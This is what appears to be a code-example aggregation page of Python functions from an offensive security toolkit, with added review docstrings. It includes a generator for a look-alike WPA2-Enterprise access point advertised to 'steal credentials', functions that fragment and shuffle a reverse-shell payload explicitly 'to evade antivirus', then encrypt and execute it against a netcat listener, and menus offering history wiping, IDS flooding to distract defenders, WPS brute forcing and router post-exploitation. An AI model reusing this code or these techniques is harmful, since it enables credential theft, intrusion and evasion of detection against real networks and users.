Ejemplo n.º 1
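def write_hostapd_conf():
    """Prompt for AP parameters and write ``hostapd.conf`` in the log directory.

    The generated file configures an access point on ``wlan0`` that
    advertises WPA2 with 802.1X/EAP key management and forwards
    authentication to a RADIUS server on 127.0.0.1:1812.

    Review notes:
      * The three prompted values are written into the file verbatim; no
        format check is applied to the BSSID or the channel.
      * ``auth_server_shared_secret`` is a hard-coded constant. It is only
        used against the loopback RADIUS address configured here.
      * Defensive context: supplicants that validate the RADIUS server
        certificate (trusted CA plus expected server name) refuse to
        complete EAP with an access point they do not recognise, which is
        the control that matters against a look-alike enterprise AP.
    """
    # NOTE: changes the process-wide working directory as a side effect.
    os.chdir("/root/ArmsCommander/logs/MGT_ENT_cracker/")
    essid_str = raw_input(
        toolkits.yellow(
            "Enter the ESSID ('name') you want the AP to be called: "))
    bssid_str = raw_input(
        toolkits.yellow(
            "Enter the BSSID MAC address you want to be called: "))
    channel_str = raw_input(
        toolkits.yellow("Enter what channel you want to use on: "))
    hostapd_conf_contents = """
interface=wlan0
driver=nl80211
ssid={0}
bssid={1}
logger_stdout_level=0
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=2
wpa_key_mgmt=WPA-EAP
channel={2}
wpa_pairwise=TKIP CCMP""".format(essid_str, bssid_str, channel_str)
    # Context manager closes the handle even if the write fails.
    with open("hostapd.conf", "w") as w:
        w.write(hostapd_conf_contents)
    print(toolkits.green("Your new hostapd conf file is completed"))
    return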
Ejemplo n.º 2
def commandSegmentationTech(readLines):
    """Fragment and shuffle each input line, keeping the map that restores it.

    Every line is cut into pieces of at most two characters, the pieces are
    shuffled with ``random.sample``, and ``findIndexValue`` is asked where
    each original piece sits in the shuffled list.

    Returns a dict keyed by line number (starting at 0) whose values are
    ``(shuffled_pieces, index_map)`` tuples.

    Analyst note: the result is a permutation stored next to its inverse,
    so the original text is fully recoverable from the returned data. A
    signature that only matches the contiguous original string will not
    match the shuffled form; inspection has to happen after reassembly.
    """
    shuffledPayload = {}
    for position, line in enumerate(readLines):
        pieces = re.findall('..?', line)
        print("DEBUG: Malicious command broken apart before shuffling\r\n{}".format(pieces))
        scrambled = random.sample(pieces, len(pieces))
        print("DEBUG: Shuffled line to evade antivirus\r\n{}".format(scrambled))
        # One index per original piece, in original order.
        index_map = [findIndexValue(piece, scrambled) for piece in pieces]
        shuffledPayload[position] = scrambled, index_map
        print("DEBUG: Array-Map to reconstitute the payload\r\n{}".format(str(index_map)))
    print(green("DEBUG: ShuffledPayload with ArrayMaps for reconstitution:\r\n{}".format(shuffledPayload)))
    return shuffledPayload
Ejemplo n.º 3
def reconstituteLine(shuffledLine,arrayMap):
    """Rebuild a string by reading ``shuffledLine`` in the order given by ``arrayMap``.

    Each entry of ``arrayMap`` is used as an index into ``shuffledLine``;
    the selected pieces are converted with ``str`` and concatenated.
    The inputs and the result are echoed through the colour helpers.
    """
    print(red("DEBUG: Shuffled Line to Reconstitute\r\n{}".format(shuffledLine)))
    print(yellow("DEBUG: arrayMap to reconstitute the payload\r\n{}".format(arrayMap)))
    cmd = "".join([str(shuffledLine[position]) for position in arrayMap])
    print(green("DEBUG: Reconstituted Command:\r\n{}".format(str(cmd))))

    return cmd
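def pexpect_thread(cmd):
    """Run *cmd* under pexpect, wait for a timeout, EOF or marker, and log output.

    Returns ``(results, outcomes, exceptions)``:
      * ``results``    -- output read from the child ('' if nothing was read)
      * ``outcomes``   -- index returned by ``expect`` (0 timeout, 1 EOF,
                          2 marker string matched)
      * ``exceptions`` -- text written to ``exceptions_threading.log``
                          ('' when that branch did not run)

    Fixes relative to the earlier version:
      * ``results`` and ``exceptions`` are always bound, so the final
        ``return`` no longer raises ``NameError``.
      * The timeout branch opened ``airodump.log`` without a mode (read-only)
        and then wrote to it; it now appends, like the marker branch.
      * Log files are closed through context managers.

    NOTE(review): ``cmd`` is handed to ``pexpect.spawn`` as one command
    string; callers should not assemble it from unvalidated input.
    """
    # Return value is unused here; the call is kept in case timer_thread()
    # has side effects the caller relies on -- TODO confirm.
    timer_thread()
    thread = pexpect.spawn(cmd, timeout=300)
    marker = 'f**k you pexpect module'
    marker = marker.decode('utf-8')
    outcomes = thread.expect([pexpect.TIMEOUT, pexpect.EOF, marker])

    results = ''
    exceptions = ''
    if outcomes == 0:  # out of time
        print(green("pexpect.TIMEOUT condition reached"))
        results = thread.read()
        thread.terminate()
        with open('./airodump.log', 'a+') as w:
            w.write(results)
    elif outcomes == 1:
        # NOTE(review): the child has already reached EOF here, so this
        # sendline may have no effect or fail -- confirm intent.
        print(yellow("pexpect.EOF conditioning reached"))
        thread.sendline('\n')
    elif outcomes == 2:
        print(green("Woo, the variable is dog-ass"))
        print(yellow("Thank you so much for wasting my time."))
        results = thread.read()
        thread.terminate()
        with open('./airodump.log', 'a+') as w:
            w.write(results)
    else:
        # expect() is given three patterns, so this branch is a safety net.
        exceptions = str(thread.read().encode('utf-8')).strip()
        print(exceptions)
        with open('./exceptions_threading.log', 'a+') as x:
            x.write(exceptions)

    return results, outcomes, exceptions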
Ejemplo n.º 5
def five_wireless_attacks():
    """Show the wireless menu, read one choice and dispatch to its handler.

    Choices "0" to "6" clear the screen first. "0" returns to ``main()``,
    "6" re-enters this menu after its handler, and any other input prints
    an error and re-enters the menu. Re-entry is done by recursion, so each
    round adds a stack frame.
    """
    print(colored('WIRELESS ATTACKS', 'cyan', attrs=['bold']))
    opt_List = [
        '\n\t#0. Return to Main Menu',
        '#1. Cylon-Raider, automate wireless "Replay-Attacks" from the Aircrack-ng Suite',
        '#2. Cylon Heavy-Raider, automate the WPS PIN brute-forcing vulnerability with Reaver',
        '#3. Router-Sploit, Post-Exploitation hacking of APs that you cracked the passwords of',
        '#4. ARP Injection Test, seeing if your external wireless card is working properly',
        '#5. Hidden Network Decloaker, uncover hidden wireless APs',
        '#6. ***NEW*** DRADIUS WPA2-MGT/ENT (name tentative to change), impersonate Enterprise/Management/PEAP encrypted WPA2 Access Points, steal credentials!'
    ]
    print("\n\t".join(opt_List))

    # The newest entry is repeated in green below the full list.
    print(toolkits.green('\t' + opt_List[6]))

    opt_Choice = str(raw_input("Enter a OPTION: "))

    if opt_Choice not in ("0", "1", "2", "3", "4", "5", "6"):
        print(colored('You have entered a invalid option', 'red'))
        five_wireless_attacks()
        return

    # Every recognised choice starts by clearing the terminal.
    os.system('clear')
    if opt_Choice == "0":
        main()
    elif opt_Choice == "1":
        cylon_raider()
    elif opt_Choice == "2":
        heavy_raider()
    elif opt_Choice == "3":
        router_sploit()
    elif opt_Choice == "4":
        ARP_injection_test()
    elif opt_Choice == "5":
        hidden_network_decloaker()
    else:  # "6"
        mgt_ent_attacker()
        five_wireless_attacks()
Ejemplo n.º 6
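def readSuspectedDomains(
    suspectedDomains='/home/ctlister/Documents/Contract-VirusTotal/real_malware_domains.txt'
):
    """Read a list of suspected domains and run ``testFunction`` on each one.

    Args:
        suspectedDomains: path to a text file with one host per line.

    Changes relative to the earlier version:
      * The file is read inside a ``with`` block, so the handle is closed
        before any host is processed.
      * The unused ``random.sample(l, 4)`` call is gone; it raised
        ``ValueError`` whenever the file held fewer than four lines.
      * Blank lines are skipped instead of being passed on as an empty host.
    """
    with open(suspectedDomains, 'r') as r:
        hosts = [line.strip() for line in r]

    for host in hosts:
        if not host:
            continue
        print(toolkits.green("Targeting {}".format(host)))
        testFunction(host)
    return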
Ejemplo n.º 7
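def launch_teamserver(login_parameters):
    """Start the supporting services and then launch ``teamserver``.

    Args:
        login_parameters: sequence whose first item is the public IP and
            whose second item is the teamserver password.

    Change relative to the earlier version: the final command was built by
    string formatting and run through ``os.system``, so a password or IP
    containing spaces or shell metacharacters was interpreted by the shell.
    It is now passed as an argument list without a shell.

    Review notes:
      * The password is still a command-line argument, so it is visible in
        the process list while ``teamserver`` runs.
      * ``killall ruby`` terminates every process named ruby on the host,
        not only the msfrpc daemon.
    """
    import subprocess  # local import: the file's import block is not visible here

    # NOTE: changes the process-wide working directory as a side effect.
    os.chdir('/usr/share/armitage')
    public_ip = str(login_parameters[0])
    teamserver_password = str(login_parameters[1])
    print(toolkits.green('PRE-FLIGHT: BEGINNING PRE-FLIGHT CHECKS'))
    print(toolkits.yellow('PRE-FLIGHT: Starting up PostgreSQL server'))
    os.system('service postgresql start')
    print(toolkits.yellow('PRE-FLIGHT: Starting up Metasploit Service'))
    os.system('service metasploit start')
    print(toolkits.yellow('PRE-FLIGHT: Initializing Metasploit Database'))
    os.system('msfdb init')
    print(toolkits.green('LAUNCHING: Starting Metasploit Database'))
    os.system('msfdb start')
    print(toolkits.yellow(
        'LAUNCHING: Killing all RUBY processes to shut down existing PIDs of msfrpc daemon'
    ))
    os.system('killall ruby')
    print(toolkits.yellow(
        'LAUNCHING: Killing any processes occupying PORT 55553'))
    os.system('fuser -k 55553/tcp')
    print(toolkits.green('Starting up Teamserver!'))
    try:
        # Argument list, no shell: the two values reach the program unparsed.
        subprocess.call(['teamserver', public_ip, teamserver_password])
    except OSError as err:
        # os.system only reported a missing binary; keep that non-fatal.
        print(toolkits.yellow('Could not start teamserver: {}'.format(err)))
    return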
Ejemplo n.º 8
def main():
    """Build a payload file from the template, print debug output and run it.

    Steps, in order: obtain a key and IV, read the template, fragment and
    shuffle the lines of ``template_reverse_shell``, pass the result to
    ``cryptor``, write the output file, print the intermediate values, open
    a terminal with a netcat listener on ``LPORT`` and execute the
    generated file.

    NOTE(review): ``LPORT`` and the output path are interpolated into
    command strings run by ``os.system``; the file opened for the debug
    dump is never closed.
    """
    key = generateKey()
    iv = generateIV()
    template_code = read_template()
    # Bare name lookup kept as in the original: no effect unless the name
    # is undefined, in which case it raises NameError here.
    template_reverse_shell

    plain_lines = template_reverse_shell.splitlines()
    shuffled = commandSegmentationTech(plain_lines)
    encrypted = cryptor(shuffled, key, iv)
    out_path = writeUniquePayload(template_code, encrypted, key, iv)
    print(red("DEBUG: Shuffled payload\r\n{}".format(str(shuffled))))
    encoded = b64encode(encrypted)
    print(yellow("DEBUG: Encrypted payload\r\n{}".format(str(encoded))))
    print(green("DEBUG: Payload generated at\r\n{}".format(str(out_path))))
    handle = open(out_path, 'rb+')
    file_contents = handle.read()
    print(red("DEBUG: Contents of {}\r\n".format(str(out_path))))
    print(yellow(file_contents))
    print(cyan("Opening netcat session"))
    listener_cmd = """gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format(
        str(LPORT))
    os.system(listener_cmd)
    print(green("You may run the payload with\r\npython {}".format(
        str(out_path))))
    time.sleep(2)
    print(green("Executing payload"))
    run_cmd = "python {}".format(str(out_path))
    os.system(run_cmd)
    return
Ejemplo n.º 9
def three_remote_exploits_redesigned():
    """Show the remote-exploitation menu, read one choice and dispatch it.

    "0" clears the screen and returns to ``main()``. "1" to "4" clear the
    screen, run their handler and then re-enter this menu. Any other input
    prints an error and re-enters the menu. Re-entry is done by recursion,
    so each round adds a stack frame.
    """
    print(colored('REMOTE EXPLOITATION', 'cyan', attrs=['bold']))

    opt_List = [
        '\n\t#0. Return to Main Menu',
        '#1. PAYLOAD GENERATORS & LISTENERS, Metasploit Msfvenom, and open source alternatives RATs like Pupy and Stitch',
        '#2. TOOLKITS, Social Engineers Toolkit',
        '#3. OTHER, Does not fit in any other category, USB Rubber Ducky Encoders, stuff like Virus-Total Safe-Checker',
        '#4. ***NEW***: FOREPLAY PROJECT, Easy-Mode Hacker Collaboration, gang up on single targets, easily generate Armitage Teamservers!'
    ]

    print("\n\t".join(opt_List))

    # The newest entry is repeated in green below the full list.
    print(toolkits.green('\t' + opt_List[4]))
    opt_Choice = str(raw_input("Enter a OPTION: "))

    if opt_Choice == "0":
        os.system('clear')
        main()
        return

    if opt_Choice not in ("1", "2", "3", "4"):
        print(colored('You have entered a invalid option', 'red'))
        three_remote_exploits_redesigned()
        return

    os.system('clear')
    if opt_Choice == "1":
        payload_generators_listeners()
    elif opt_Choice == "2":
        remote_exploit_toolkits()
    elif opt_Choice == "3":
        remote_exploits_other()
    else:  # "4"
        foreplay()
    # Every sub-menu returns here and the menu is shown again.
    three_remote_exploits_redesigned()
    return
Ejemplo n.º 10
def two_net_defense_traffic_monitor():
    """Show the network-defense menu, read one choice and dispatch it.

    "0" clears the screen and returns to ``main()``. "1" to "9" clear the
    screen, print a start banner and call their handler. "10" clears the
    screen, copies ``/var/log/auth.log`` to ``/root/Documents``, prints the
    log and returns to ``main()``. "11" runs its handler without clearing
    and re-enters this menu. Any other input prints an error and re-enters
    the menu by recursion.
    """
    print(colored('NETWORK DEFENSE', 'cyan', attrs=['bold']))
    opt_List = [
        '\n\t#0 Return to Main Menu',
        '#1. Tor + Proxychains, conceal your outbound traffic',
        '#2. Network Monitoring Tools, p0f, Snort, and view active network connections',
        '#3. Cover your tracks, clear your bash history and wipe your thumbnails cache',
        '#4. TCP Kill a connection by host, IP, or port',
        '#5. NGrep or "Network Grep", investigate a suspicious connection',
        '#6. MacChanger, change your network card MAC address temporarily',
        '#7. Fuser, identify and kill processes within a port range',
        '#8. IDS Flooder, overwhelm a Intrusion Detection System with false-flag DDoS attacks to draw attention away from your actual activity',
        '#9. FAIL-2-BAN, automatic banning daemon for SSH. Absolutely essential for remote AWS servers that are subjected to constant SSH brute-force attacks',
        '#10. VIEW AUTH LOG, view your authentication log and make a backup of it.',
        '#11. ***NEW***, JKD: Bluce-Ree Edition, auto-counterattack aggressive NMAP scans using a Metasploit Server Design Flaw'
    ]
    print("\n\t".join(opt_List))

    # The newest entry is repeated in green below the full list.
    print(toolkits.green('\t' + opt_List[11]))
    opt_Choice = str(raw_input("Enter a OPTION: "))

    # Option 11 is the only recognised choice that does not clear the screen.
    if opt_Choice == "11":
        jkd_poc()
        two_net_defense_traffic_monitor()
        return

    # Start banners for the handlers behind options 1-9 (text only).
    start_banners = {
        "1": '[+] Starting Tor + Proxychains',
        "2": '[+] Starting Monitoring Tools',
        "3": '[+] Starting Cover Your Tracks',
        "4": '[+] Starting TCP Kill',
        "5": '[+] Starting Network Grep',
        "6": '[+] Starting Mac Changer Interactive Menu',
        "7": '[+] Starting Fuser',
        "8": '[+] Starting IDS Flooder Module',
        "9": '[+] Starting fail2ban Module',
    }

    if opt_Choice != "0" and opt_Choice != "10" and opt_Choice not in start_banners:
        print(colored('You have entered a invalid option', 'red'))
        two_net_defense_traffic_monitor()
        return

    os.system('clear')

    if opt_Choice == "0":
        main()
        return

    if opt_Choice == "10":
        print(colored('[+] Copying backup of auth.log to /root/Documents',
                      'yellow',
                      attrs=['bold']))
        os.system('cp -r /var/log/auth.log /root/Documents')
        os.system('cat /var/log/auth.log')
        main()
        return

    print(colored(start_banners[opt_Choice], 'green', attrs=['bold']))
    if opt_Choice == "1":
        tor_and_proxychains()
    elif opt_Choice == "2":
        network_monitor_tools()
    elif opt_Choice == "3":
        cover_tracks()
    elif opt_Choice == "4":
        TCPKill()
    elif opt_Choice == "5":
        NGrep()
    elif opt_Choice == "6":
        macchanger()
    elif opt_Choice == "7":
        fuser()
    elif opt_Choice == "8":
        IDS_Flooder()
    else:  # "9"
        fail2ban()

    return
def green(string):
    """Colour ``string`` with ``toolkits.green``, print it and return it.

    Because this helper prints as well as returns, a caller that prints
    the return value emits the text twice.
    """
    coloured_text = toolkits.green(string)

    print(coloured_text)
    return coloured_text